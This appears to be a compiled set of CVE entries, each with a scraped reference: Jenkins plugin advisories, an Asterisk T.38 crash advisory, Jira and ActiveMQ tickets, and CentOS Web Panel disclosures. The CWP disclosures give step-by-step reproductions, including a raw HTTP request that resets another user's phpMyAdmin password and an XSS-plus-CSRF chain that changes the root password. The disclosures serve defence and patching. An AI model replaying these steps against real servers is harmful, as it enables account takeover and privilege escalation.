Jenkins Violation Comments to GitLab Plugin 2.28 and earlier stored credentials unencrypted in job config.xml files on the Jenkins master where they could be viewed by users with Extended Read permission, or access to the master file system.

CVE-2019-10416: Jenkins Security Advisory 2019-09-25

Jenkins Log Parser Plugin 2.0 and earlier did not escape an error message, resulting in a cross-site scripting vulnerability exploitable by users able to define log parsing rules.

CVE-2019-10410: Jenkins Security Advisory 2019-09-25

Jenkins NeuVector Vulnerability Scanner Plugin 1.5 and earlier stored credentials unencrypted in its global configuration file on the Jenkins master where they could be viewed by users with access to the master file system.

CVE-2019-10430: Jenkins Security Advisory 2019-09-25

Jenkins Gem Publisher Plugin stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.

CVE-2019-10426: Jenkins Security Advisory 2019-09-25

res_pjsip_t38 in Sangoma Asterisk 15.x before 15.7.4 and 16.x before 16.5.1 allows an attacker to trigger a crash by sending a declined stream in a response to a T.38 re-invite initiated by Asterisk. The crash occurs because of a NULL session media object dereference.

Asterisk Project Security Advisory - AST-2019-004

 

**Product**

Asterisk

**Summary**

Crash when negotiating for T.38 with a declined stream

**Nature of Advisory**

Remote Crash

**Susceptibility**

Remote Authenticated Sessions

**Severity**

Minor

**Exploits Known**

No

**Reported On**

August 05, 2019

**Reported By**

Alexei Gradinari

**Posted On**

September 05, 2019

**Last Updated On**

September 4, 2019

**Advisory Contact**

kharwell AT sangoma DOT com

**CVE Name**

CVE-2019-15297

 

**Description**

When Asterisk sends a re-invite initiating T.38 faxing, and the endpoint responds with a declined media stream a crash will then occur in Asterisk.

**Modules Affected**

res\_pjsip\_t38.c

 

**Resolution**

If T.38 faxing is not required then setting the “t38\_udptl” configuration option on the endpoint to “no” disables this functionality. This option defaults to “no” so you have to have explicitly set it “yes” to potentially be affected by this issue.

Otherwise, if T.38 faxing is required then Asterisk should be upgraded to a fixed version.

  

**Affected Versions**

**Product**

**Release Series**

Asterisk Open Source

15.x

All releases

Asterisk Open Source

16.x

All releases

 

**Corrected In**

**Product**

**Release**

Asterisk Open Source

15.7.4,16.5.1

 

**Patches**

**SVN URL**

**Revision**

http://downloads.asterisk.org/pub/security/AST-2019-004-15.diff

Asterisk 15

http://downloads.asterisk.org/pub/security/AST-2019-004-16.diff

Asterisk 16

 

**Links**

https://issues.asterisk.org/jira/browse/ASTERISK-28495

Asterisk Project Security Advisories are posted at http://www.asterisk.org/security

This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2019-004.pdf and http://downloads.digium.com/pub/security/AST-2019-004.html

  

**Revision History**

**Date**

**Editor**

**Revisions Made**

August 28, 2019

Kevin Harwell

Initial revision

Asterisk Project Security Advisory - AST-2019-004  
Copyright © 2019 Digium, Inc. All Rights Reserved.  
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.

CVE-2019-15297: AST-2019-004

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.837, XSS in the domain parameter allows a low-privilege user to achieve root access via the email list page.

**Information**

    Product             : CWP Control Web Panel
    Vulnerability Name  : Cross Site Scripting
    version             : 0.9.8.837
    Fixed on            : 0.9.8.851
    Test on             : CentOS 7.6.1810 (Core)
    Reference           : http://centos-webpanel.com/
                        : https://control-webpanel.com/changelog
    CVE-Number          : CVE-2019-13476
    

  
**Description**

User add "New Mail box" with payload XSS without validation

  
**Reproduce**

1.  In user panel and browse to https://192.168.242.135:2083/cwp\_1a73dced77d0eb7f/test1/?module=email\_accounts or Click at Email Accounts under the Email Accounts and click it again like image below

  

2.  Click "Add a New MailBox"

  

3.  Fill the information

  

4.  Use BurpSuite for Intercept request then modified parameter "domain" to payloads XSS

  

5.  We can added email success the parameter "domain" without input validate

  

6.  In the List of mailbox user it's not exist after add email with xss payload, but in the admin panel added success

  

7.  Let's see in the panel admin Click Email --> Email Accounts we can see the xss payload

  

8.  Click any the button such as Change Password, Suspend, Delete XSS payload will be Executed

  

9.  In this example I'll tried to Click Change Password, XSS will be executed

!

**Timeline**

    2019-06-05: Discovered the bug
    2019-06-05: Reported to vendor
    2019-06-05: Vender accepted the vulnerability
    2019-07-17: The vulnerability has been fixed
    2019-08-20: Advisory published
    

  
**Discovered by**

    Pongtorn Angsuchotmetee
    Nissana Sirijirakal 
    Narin Boonwasanarak

CVE-2019-13476: CentOS-Control-Web-Panel-CVE/CVE-2019-13476.md at master · i3umi3iei3ii/CentOS-Control-Web-Panel-CVE

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to discover phpMyAdmin passwords (of any user in /etc/passwd) via an attacker account.

    Exploit Title       : CWP (CentOS Control Web Panel) Reset other phpMyadmin passwordDate                : 24 Jul 2019Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin BoonwasanarakVendor Homepage     : https://control-webpanel.com/Software Link       : Not available, user panel only available for lastest versionVersion             : 0.9.8.851Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)CVE-Number          : CVE-2019-14246Reference      : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-14246.md1. Login as attacker (low privilege)2. Go to "Mysql Manager"3. Try to change user password of any record4. Intercept the requestPOST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1Host: 192.168.80.148:2083User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430X-Requested-With: XMLHttpRequestContent-Length: 54Connection: closeReferer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_managerCookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2dates=alice_alice||localhost&passuser=UEBzc3cwcmQxMjM05. Modify the request (parameter "dates") and submitPOST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1Host: 192.168.80.148:2083User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430X-Requested-With: XMLHttpRequestContent-Length: 54Connection: closeReferer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_managerCookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2dates=bob||localhost&passuser=UEBzc3cwcmQxMjM0

CVE-2019-14246: CentOS-WebPanel.com Control Web Panel (CWP) 0.9.8.851 phpMyAdmin Password Change ≈ Packet Storm

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.837, CSRF in the forgot password function allows an attacker to change the password for the root account.

**Information**

    Product             : CWP Control Web Panel
    Vulnerability Name  : Cross Site Scripting
    version             : 0.9.8.837
    Fixed on            : 0.9.8.851
    Test on             : CentOS 7.6.1810 (Core)
    Reference           : http://centos-webpanel.com/
                        : https://control-webpanel.com/changelog
    CVE-Number          : CVE-2019-13476
    

  
**Description**

CVE-2019-13476 (XSS) + CVE-2019-13477 (CSRF) Can change password no need to know current password

  
**Reproduce**

1.  login as normal user

  

2.  Click at Email Accounts under the Email Accounts and click it again like image below

  

3.  Click add "New MailBox"

  

4.  add "New mail" and intercept request (use Burp suite for intercept request)

  

5.  Insert payload at parameter "domain" then click "intercept is on" in burp suite

  

6.  Payload added success (in mail box panel user it's doesn't exist after add payload XSS but in panel admin it's will exist)

Script change password (PoC.php)

  

7.  Login as user root (victim) user : root pass : P@ssw0rd

  

8.  After login we will see the left side tap and click at "Email" then click "Email Accounts" under "Email" like image below

  

9.  We can see payload

  

10.  Click any button such as Change Password, Suspend, Delete after click Payload will be executed.

  

11.  After click it's will be redirect and password has been changed password is "AttackerPassword"

  

12.  try to login with old password "P@ssw0rd" we got login failed (image below)

  

13.  Login as root and new password "AttackerPassword"

  

14.  Login success

**Timeline**

    2019-06-05: Discovered the bug
    2019-06-05: Reported to vendor
    2019-06-05: Vender accepted the vulnerability
    2019-07-17: The vulnerability has been fixed
    2019-08-20: Advisory published
    

  
**Discovered by**

    Pongtorn Angsuchotmetee
    Nissana Sirijirakal 
    Narin Boonwasanarak

CVE-2019-13477: CentOS-Control-Web-Panel-CVE/CVE-2019-13477.md at master · i3umi3iei3ii/CentOS-Control-Web-Panel-CVE

The inline-create rest resource in Jira before version 7.12.3 allows authenticated remote attackers to set the reporter in issues via a missing authorisation check.

**Details**

*   **Type: ** Bug
    

*   **Priority: ** Medium
    
*   **Resolution:** Fixed
    
*   **Affects Version/s:** 7.8.0, 7.10.1
    

*   **Labels:**
    
    *   CVE-2018-20826
    *   advisory
    *   advisory-released
    *   bugbounty
    *   cvss-medium
    *   idor
    *   security
    

*   **Fixed in Long Term Support Release/s:**
    
*   **Introduced in Version:**
    
    7.08
    
*   **Symptom Severity:**
    
    Severity 3 - Minor
    

**Description**

The inline-create rest resource in Jira before version 7.12.3 allows authenticated remote attackers to set the reporter in issues via a missing authorisation check.

**Attachments**

**Activity**

**People**

Votes:

0 Vote for this issue

Watchers:

1 Start watching this issue

**Dates**

Created:

29/Apr/2019 3:27 AM

Updated:

22/May/2020 8:22 AM

Resolved:

29/Apr/2019 3:29 AM

CVE-2018-20826: [JRASERVER-69239] Permissions bypass in the inline-create rest resource - CVE-2018-20826

It was found that the Apache ActiveMQ client before 5.14.5 exposed a remote shutdown command in the ActiveMQConnection class. An attacker logged into a compromised broker could use this flaw to achieve denial of service on a connected client.

Log inSkip to main contentSkip to sidebar

*   Dashboards
*   Projects
*   Issues

*   Help
    
    *   Jira Core help
    *   Keyboard Shortcuts
    *   About Jira
    *   Jira Credits
    
*   Log In

Public signup for this instance is **disabled**. Go to our Self serve sign up page to request an account.

1.  ActiveMQ
2.  AMQ-6470

Log In

Export

XMLWordPrintableJSON

**Details**

*   **Type: ** Improvement
    
*   **Status:** Resolved
    
*   **Priority: ** Major
    
*   **Resolution:** Fixed
    
*   **Affects Version/s:** 5.14.1
    
*   **Fix Version/s:** 5.15.0, 5.14.5
    
*   **Component/s:** None
    
*   **Labels:**
    
    None
    

**Description**

We still have unnecessary handling for ControlCommand in ActiveMQClient

**Attachments**

**Activity**

**People**

Assignee:

 Dejan Bosanac

Reporter:

 Dejan Bosanac

Votes:

0 Vote for this issue

Watchers:

4 Start watching this issue

**Dates**

Created:

18/Oct/16 10:00

Updated:

25/Apr/17 08:58

Resolved:

18/Oct/16 10:32

Tag

#jira